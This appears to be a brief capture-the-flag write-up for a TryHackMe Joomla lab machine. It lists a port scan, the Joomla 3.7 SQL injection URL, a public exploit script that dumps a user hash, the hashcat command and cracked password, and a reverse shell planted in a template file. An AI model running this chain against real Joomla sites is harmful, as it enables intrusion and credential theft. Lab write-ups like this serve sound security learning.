CTF Daily Bugle

CTFTryHackMe

rustscan

1
rustscan -a 10.10.56.151 --ulimit 5000

robots.txt

http://10.10.56.151/robots.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

jumla

http://10.10.56.151//htaccess.txt

we are in 2023, there is few CVE here.

https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html

http://10.10.56.151/index.php?option=com_fields&view=fields&layout=modal

sqli

https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py

1
Found user ['811', 'Super User', 'jonah', '[email protected]', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']

Crack the hash

1
hashcat -m 3200 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

Output:

1
$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm:spiderman123

jonah:spiderman123

revershell

https://www.hackingarticles.in/joomla-reverse-shell/
in error.php
then
10.10.56.151/index.php/zefzef

lse

polkit